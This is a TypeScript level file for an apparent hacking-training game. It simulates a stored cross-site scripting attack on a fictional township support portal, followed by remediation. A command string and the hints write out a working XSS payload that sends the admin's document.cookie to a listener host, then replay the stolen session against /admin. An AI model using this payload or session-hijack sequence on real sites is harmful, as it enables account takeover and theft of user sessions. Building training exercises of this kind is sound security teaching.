import type { ChainDef } from "../../types";
import { match, cmd } from "../../engine";

const IP = "203.0.113.30";

export const easyLevel5: ChainDef = {
  id: "easy-5",
  difficulty: "easy",
  order: 5,
  points: 50,
  title: "Open Comment",
  codename: "OPERATION OPEN COMMENT",
  summary: "Whatever a citizen types into that comment box, an admin's browser is going to run it.",
  briefing: [
    "Aldermere Township runs a small citizen support portal — potholes, trash pickup, noise",
    "complaints. Anyone can file a ticket. A staff admin reviews the queue by hand a few times a",
    "day.",
    "",
    "Nobody ever asked what happens to a ticket's text once it's rendered back on that admin's",
    "screen. Find out.",
  ],
  debrief: [
    "root cause: ticket comments were rendered into the admin queue view with no output encoding —",
    "stored cross-site scripting (CWE-79, OWASP A03:2021). A script embedded in an ordinary-looking",
    "ticket ran in the admin's browser the moment they opened the queue, and quietly handed over",
    "their session cookie.",
    "",
    "This is one of the single most common findings in real assessments of small internal tools: not",
    "an exotic bypass, just a text field nobody ever taught to distrust its own input.",
    "",
    "ALDERMERE TOWNSHIP SERVICES: SECURED.",
  ],
  nodes: [
    {
      id: "aldermere",
      org: "Aldermere Township Services",
      city: "Aldermere",
      state: "NH",
      coords: { x: 72, y: 11 },
      ip: IP,
      tagline: "Municipal citizen support portal",
      briefing: [
        "TARGET: Aldermere Township citizen support portal",
        `IP: ${IP}`,
        "KNOWN: public ticket-submission form, reviewed by a staff admin a few times a day.",
        "",
        "Find out how the admin's browser treats what a citizen types.",
      ],
      initialPrompt: "op@breachline:~$",
      motd: [
        "session notes.txt:",
        "  \"Township clerk asked us to take a look after a resident joked their ticket 'did something",
        "   weird' on submit. Probably nothing. Check anyway.\" — dispatch",
      ],
      objectives: [
        { id: "recon", label: "Enumerate open services on the target", tactic: "Reconnaissance" },
        { id: "webenum", label: "Find the ticket form and confirm comments render unsanitized", tactic: "Discovery", requires: ["recon"] },
        {
          id: "xss-inject",
          label: "Submit a stored XSS payload that exfiltrates the admin's session cookie",
          tactic: "Initial Access",
          requires: ["webenum"],
        },
        { id: "creds", label: "Replay the stolen session cookie against the admin panel", tactic: "Credential Access", requires: ["xss-inject"] },
        { id: "secure", label: "Encode ticket output and invalidate the stolen session", tactic: "Remediation", requires: ["creds"] },
      ],
      hints: [
        "Recon first — `nmap -sV <ip>`. Then check the web root for the ticket form itself.",
        "Read the page source carefully, not just what's visible — a comment left in the HTML can tell you exactly how ticket text gets handled downstream.",
        "If comments render as-is in the admin queue, a `<script>` tag in a ticket comment runs in the admin's browser, not yours. Point it at your own listener and grab `document.cookie`.",
        "Give it a little in-story time for the admin to open the queue, then check your listener log for what came back.",
        "You have a real session value now. Replay it as a `Cookie` header against `/admin` — you don't need a password if you have a live session.",
      ],
      debrief: [
        "root cause: /support rendered submitted ticket comments directly into the admin queue view with",
        "no output encoding, allowing a stored <script> payload to execute in the admin's browser and",
        "exfiltrate their session cookie.",
        "fix applied: ticket comments HTML-encoded on output, admin session invalidated and rotated,",
        "a Content-Security-Policy header added as defense in depth.",
      ],
      commands: [
        cmd({
          id: "nmap",
          tool: "nmap",
          requires: [IP],
          help: "nmap -sV <ip>         — service/version scan",
          run: () => ({
            completesObjective: "recon",
            tone: "success",
            setsFlags: ["scanned"],
            output: [
              "PORT   STATE SERVICE VERSION",
              "80/tcp open  http    nginx 1.24.0 (Aldermere Township support portal)",
              "",
              "Nmap done: 1 IP address (1 host up) scanned in 3.70 seconds",
            ],
          }),
        }),
        cmd({
          id: "curl-root",
          tool: "curl",
          requires: [IP],
          forbids: ["support", "admin", "listener.log"],
          help: "curl http://<ip>      — fetch the web root",
          requiresObjectives: ["recon"],
          run: () => ({
            tone: "output",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "<title>Aldermere Township — Citizen Support</title>",
              '<a href="/support">File a ticket</a>',
            ],
          }),
        }),
        cmd({
          id: "curl-support",
          tool: "curl",
          requires: ["support"],
          forbids: ["-d", "listener.log", "admin"],
          help: "curl http://<ip>/support",
          requiresFlags: ["scanned"],
          run: () => ({
            completesObjective: "webenum",
            tone: "success",
            setsFlags: ["found_ticket_form"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              '<form action="/support" method="POST"><textarea name="comment"></textarea></form>',
              "<!-- ticket comments render as-is in the admin queue view, no escaping applied -->",
            ],
          }),
        }),
        cmd({
          id: "xss-inject",
          tool: "curl",
          requires: ["support", "-d", "<script", "document.cookie", "10.10.14.7"],
          help: `curl -X POST http://<ip>/support -d "comment=<script>fetch('http://10.10.14.7/steal?c='+document.cookie)</script>"`,
          requiresFlags: ["found_ticket_form"],
          run: () => ({
            completesObjective: "xss-inject",
            tone: "success",
            setsFlags: ["xss_stored"],
            output: [
              "HTTP/1.1 200 OK",
              "",
              '{"ticket_id": 4471, "status": "submitted"}',
              "",
              "[+] payload stored — it'll run the next time the admin opens the queue.",
            ],
          }),
        }),
        cmd({
          id: "cat-listener",
          tool: "cat",
          requires: ["listener.log"],
          help: "cat listener.log",
          requiresFlags: ["xss_stored"],
          run: () => ({
            tone: "success",
            setsFlags: ["have_admin_cookie"],
            note: "Aldermere Township Services — stolen admin session cookie: session=a1f9c2e7b04d",
            output: [
              "[10:42:03] GET /steal?c=session=a1f9c2e7b04d HTTP/1.1",
              "",
              "[+] the admin opened the queue. their session cookie is sitting right here.",
            ],
          }),
        }),
        cmd({
          id: "replay-cookie",
          tool: "curl",
          requires: ["admin", "cookie:", "session="],
          help: 'curl -H "Cookie: session=a1f9c2e7b04d" http://<ip>/admin',
          requiresFlags: ["have_admin_cookie"],
          run: () => ({
            completesObjective: "creds",
            tone: "success",
            output: [
              "HTTP/1.1 200 OK",
              "",
              "=== Aldermere Township — Admin Queue ===",
              "tickets | residents | staff accounts | settings",
              "",
              "[+] no password needed — a live session was all it took.",
            ],
          }),
        }),
        {
          id: "secure",
          tool: "secure",
          match: match.startsWith("secure system", "secure", "remediate"),
          help: "secure system",
          requiresObjectives: ["creds"],
          deniedOutput: ["confirm you actually reached the admin queue before you file the fix."],
          run: () => ({
            completesObjective: "secure",
            tone: "success",
            output: [
              "[+] HTML-encoded ticket comment output in the admin queue view",
              "[+] invalidated and rotated the stolen admin session",
              "[+] added a Content-Security-Policy header as defense in depth",
              "",
              "ALDERMERE TOWNSHIP SERVICES: SECURED",
            ],
          }),
        },
      ],
    },
  ],
};
